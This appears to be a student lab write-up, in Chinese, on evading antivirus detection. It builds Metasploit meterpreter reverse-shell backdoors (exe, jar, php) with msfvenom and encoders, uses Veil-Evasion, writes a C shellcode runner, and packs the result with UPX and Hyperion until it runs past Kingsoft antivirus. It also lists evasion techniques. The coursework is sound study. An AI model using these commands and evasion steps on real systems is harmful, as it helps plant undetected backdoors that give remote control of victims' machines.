2018-2019-2 网络对抗技术 20165334 Exp3 免杀原理与实践

本文介绍了一种通过多种技术组合实现恶意代码免杀的方法,包括使用msf编码器、veil-evasion工具、手工注入Shellcode及加壳技术等。通过这些技术的应用,成功实现了恶意代码在主流杀毒软件下的隐蔽运行。

2018-2019-2 网络对抗技术 20165334 Exp3 免杀原理与实践

一、实验内容

任务一正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,利用shellcode编程等免杀工具或技巧
1、使用msf编码器,生成exe文件
  • 使用exp2中生产的后门程序20165334_backdoor.exe利用VirusTotal网站进行扫描检测。
    1289294-20190328103537880-1010829025.png
  • 20165334_backdoor.exe利用Virscan网站进行扫描检测。
    1289294-20190328104240892-1649908021.png
    -使msf编码器对后门程序进行多次的编码,并检测。
    msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 15 -b ‘\x00’ LHOST=192.168.56.102 LPORT=5334 -f exe > met-lt5334l.exe

1289294-20190328114205636-165165045.png

  • 用使用virscan进行扫描,结果如下所示
    1289294-20190328120033473-1188881430.png

  • msfvenom生成jar文件msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=5334 x> ltl_backdoor_java.jar
  • 用使用virscan进行扫描,结果如下所示
    1289294-20190328120624361-166063247.png
  • msfvenom生成php文件msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=5334 x> 20155334_backdoor.php
  • 用使用virscan进行扫描,结果如下所示
    1289294-20190328121212711-647743062.png

    2、使用veil-evasion生成后门程序及检测
  • sudo apt-get install veil命令安装Veil,若遇到问题则用sudo apt-get upgrade这两个命令更新一下软件包即可之后用veil打开veil,输入y继续安装直至完成。
    1289294-20190328154947326-1674483717.png
    -设置反弹连接IPset LHOST 192.168.56.102(IP是KaliIP)
  • 设置端口set LPORT 5334
    1289294-20190328171550744-2044210801.png
  • 输入generate生成文件,接着输入你想要playload的名字:baddoor5334
    1289294-20190328171749120-237170496.png
  • 扫描检测

1289294-20190328194401035-378442832.png

3、半手工注入Shellcode并执行
  • 使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.102LPORT=5334 -f c用c语言生成一段shellcode

1289294-20190328195402065-1315317937.png
-利用上面生成的数组拿来编写一个程序,结构如下

unsigned char buf[] = 
"此处复制粘贴之前用msf生成的buf"

int main()
{
    int (*func)() = (int(*)())buf;
    func();
}
  • 使用命令i686-w64-mingw32-g++ shell5334.c -o shell5334.exe编译

1289294-20190328201905843-1954675547.png

  • 扫描检测

1289294-20190328203212958-1447534348.png

-x尝试运行结果被360拦截了。

1289294-20190328203458895-1522486678.png

以上尝试可以看出没有处理的后门程序基本上都可以检测出来。
加壳
  • 压缩壳 :减少应用体积,如ASPack,UPX
  • 加密壳: 版权保护,反跟踪。如ASProtect,Armadillo

  • 虚拟机 :通过类似编译手段,将应用指令转换为自己设计的指令集。如VMProtect,Themida

    1、使用压缩壳(UPX)

1289294-20190328225243585-1967396430.png

还是没能幸免,立刻被杀软截杀

1289294-20190329183444379-601224641.png

1289294-20190329185100088-1568717054.png

在360中添加信任后测试其可用性。

1289294-20190329190202099-285789411.png

2、加密壳Hyperion
  • 将上一个生成的文件拷贝到/usr/share/windows-binaries/hyperion/目录中
  • 进入目录/usr/share/windows-binaries/hyperion/
  • 输入命令wine hyperion.exe -v xxx.exe yyy.exe进行加壳
  • 1289294-20190329191250498-575935180.png

1289294-20190329191327441-2071175109.png

反弹连接

1289294-20190329192436263-13160630.png

检测结果

1289294-20190329192603181-426698953.png

任务二:通过组合应用各种技术实现恶意代码免杀
  • 通过组合半手工制作shellcode,压缩壳,加密壳Hyperion达到了免杀的目的。

    任务成功截图

    1289294-20190329192436263-13160630.png

1289294-20190329200750406-2041973157.png

任务三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本
  • 杀软名称:金山毒霸
  • 电脑版本:win7x64系统

    使用方法:半手工注入Shellcode+加壳。
    成功截图

1289294-20190330163215131-816015921.png

金山毒霸扫描结果

1289294-20190330163158096-477853679.png

实验中遇到的问题
  • 在实验三中,Linux系统ping不通windos7,y通过修改网络连接方式为桥接,修改两ip到通一网段得以解决。

    免杀原理及基础问题回答
  • 免杀思路:
    (1)对病毒木马文件通过各种技术进行修改;
    (2)拓展病毒木马文件功能,甚至是攻击杀软来达到目的。
  • 基础问题回答
    1)杀软是如何检测出恶意代码的?
  • 杀毒软件(AV)是一个较大规模安全防护策略的重要组成部分,能够减缓恶意软件在互联网上的传播速度,保护用户主机。
  • 特征库举例:首先对已经有过的恶意代码建立特征库,对其特征码进行匹配检测,若匹配成功,则为恶意代码需进行防范。因此有些新型恶意代码则更容易绕过杀软,在被检测出之前,可能有部分用户会被感染,因此需要及时更新恶意代码特征库。
    -启发式恶意软件检测:根据些片面特征去推断。通常是因为缺乏精确判定依据。
  • 基于行为的恶意软件检测:监控该代码的行为,看是否有恶意行为,或正在做与恶意代码所做的事情相同,威胁到主机安全,则极有可能为恶意代码。

    (2)免杀是做什么?
  • 免杀即“反杀毒技术”,让安插的后门不被AV软件发现。通过改变代码的特征,让杀毒软件成为摆设,防止被杀软查杀的一种技术。

    (3)免杀的基本方法有哪些?
    修改方法:
  • 直接修改特征码的十六进制法
  • 修改字符串大小写法
  • 等价替换法
  • 指令顺序调换法
  • 通用跳转法
  • 一键加壳法

    文件免杀方法:
  • 加冷门壳
  • 加壳改壳
  • 加花指令
  • 改程序入口点

转载于:https://www.cnblogs.com/ltl123/p/10623487.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值